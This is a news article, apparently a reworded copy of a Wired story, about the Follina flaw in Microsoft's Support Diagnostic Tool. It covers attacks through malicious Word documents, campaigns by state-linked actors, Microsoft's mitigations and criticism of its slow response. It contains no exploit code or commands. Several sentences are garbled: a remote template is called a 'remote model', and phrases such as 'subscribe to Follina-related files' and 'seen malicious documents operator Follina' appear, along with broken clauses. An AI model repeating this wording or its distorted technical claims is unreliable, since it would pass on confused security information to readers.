Researchers warned last weekend that a flaw in Microsoft’s Support Diagnostic Tool could be exploited using malicious Word documents to take control of target devices remotely. Microsoft published guidance Monday, including temporary defensive measures. On Tuesday, the United States Cybersecurity and Infrastructure Security Agency had warned that “a remote, unauthenticated attacker could exploit this vulnerability”, known as Follina, “to take control of an affected system”. But Microsoft wouldn’t say when or if a patch is coming for the vulnerability, even though the company acknowledged the flaw was being actively exploited by attackers in the wild. And the company still had no comment on the possibility of an on-demand patch from WIRED.
The Follina vulnerability in a Windows Support Tool can be easily exploited by a specially crafted Word document. The decoy is equipped with a remote model that can grab a malicious HTML file and ultimately allow an attacker to execute Powershell Commands in Windows. The researchers note that they would describe the bug as a “zero-day” or previously unknown vulnerability, but Microsoft has not classified it as such.
“Once the public became aware of the exploit, we started to see an immediate response from various attackers starting to use it,” says Tom Hegel, senior threat researcher at security firm SentinelOne. . He adds that while attackers have mainly been seen exploiting the flaw via malicious documents so far, researchers have also discovered other methods, including manipulating HTML content in network traffic.
“While the malicious documents approach is very concerning, the less documented methods by which the exploit can be triggered are troubling until they are fixed,” says Hegel. “I would expect opportunistic and targeted threat actors to use this vulnerability in a variety of ways when the option is available – it’s just too easy.”
The vulnerability is present in all supported versions of Windows and can be exploited through Microsoft Office 365, Office 2013 to 2019, Office 2021 and Office ProPlus. The main mitigation offered by Microsoft is to disable a specific protocol in the Support Diagnostic Tool and use Microsoft Defender Antivirus to monitor and block the exploit.
But incident responders say more action is needed, given how easily the vulnerability can be exploited and the amount of malicious activity detected.
“We see a variety of APT actors integrating this technique into longer infection chains that use the Follina vulnerability,” says Michael Raggi, threat researcher at security firm Proofpoint, who focuses on hackers. computers supported by the Chinese government. “For example, on May 30, 2022, we observed Chinese actor APT TA413 send a malicious URL in an email impersonating the Central Tibetan Administration. Different actors subscribe to Follina-related files at different stages of their chain of infection, depending on their pre-existing toolkit and the tactics deployed.
The researchers also seen malicious documents operator Follina with targets in Russia, India, the Philippines, Belarus and Nepal. An undergraduate researcher first noticed the flaw in August 2020but it was first reported to Microsoft on April 21. The researchers also noted that Follina hacks are particularly useful to attackers because they can come from malicious documents without relying on macros, Microsoft’s popular Office document feature. tried to control.
“Proofpoint has identified a variety of actors incorporating the Follina vulnerability into phishing campaigns,” said Sherrod DeGrippo, vice president of threat research at Proofpoint.
With all of this real-world exploitation, the question is whether the advice Microsoft has published so far is adequate and proportionate to the risk.
“Security teams might take Microsoft’s nonchalant approach as a sign that this is just ‘one more vulnerability,’ which it certainly isn’t,” says Jake Williams, director of the cyber threat intelligence from security firm Scythe. “It’s unclear why Microsoft continues to downplay this vulnerability, especially when it’s being actively exploited in the wild.”
This story originally appeared on wired.com.